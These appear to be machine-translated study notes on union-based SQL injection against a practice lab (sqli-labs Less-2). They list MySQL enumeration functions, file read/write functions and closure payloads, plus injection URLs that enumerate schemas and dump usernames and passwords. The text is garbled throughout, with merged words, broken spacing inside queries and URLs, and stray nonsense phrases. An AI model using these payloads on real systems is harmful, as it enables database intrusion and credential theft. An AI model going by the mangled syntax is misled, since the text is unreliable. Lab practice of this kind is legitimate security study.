1. Underlying SQL statements
Comment Line Comment
#%23
--+--Plus spaces
Multi-line comments
/**/
SELECT(VERSION ())SELECT(USER())SELECT(Database()) Check the databaseSELECT(@ @datadir) Check the database pathSELECT(@ @version_compile_os) Check the system version
Version () database versions
Load_file () Read file operation
Current_User () Current user name (available to view permissions
into outfile ()/into dumpfile write file show DATABASES Usesecurityshow TablesSelectUsername,password fromUsers Useinformation_schemashow TablesdescTablesSelectSchema_name fromInformation_schema.schemata, check all the databases.Selecttable_name fromInformation_schema.tableswhereTable_schema="Security" check listSelectcolumn_name fromInformation_schema. COLUMNSwheretable_name="Users" check columnSelectUsername,password fromSecurity.userswhereId=TenChallie's Content
2. Note----BASIC Joint injection
The injected code is the
1. Querying the current database and user
http://10.1. 2.5:10631/sqli/less-2/? ID=-1 UnionSelect1,user(), version ()
2. Querying all databases
Http://10.1.2.5:10631/sqli/Less-2/?id=-1 Union Select 1,database (), Group_concat (schema_name) from Information_ Schema.schemata
3. Check all table names under a database
http//10.1.2.5:10631/Sqli/Less-2/? id=-1 Union Select 1,Database(), GROUP_CONCAT (table_name) fromInformation_schema.tableswhereTable_schema='Security'
4. Check all column (field) names under a table
http//10.1.2.5:10631/Sqli/Less-2/? id=-1 Union Select 1,Database(), Group_concat (column_name) fromInformation_schema.columnswheretable_name='Users'
5. Querying the contents of a field
http//10.1.2.5:10631/Sqli/Less-2/? id=-1 Union Select 1,Database(), Group_concat (ID,'--', username,'--', password) fromUsers
Some wretched gimmick.
http://10.1. 2.5:10631/sqli/less-2/? id=2 Union Select 1, Version (),3orderby2
1. General Closure characters
Digital Closure method character type ' id ' and 1=1--+ "id" "and 1=1--+ (" id ")") and 1=1--+ (' id ') ') and 1=1--+
Foundation of SQL injection for Web Security Foundation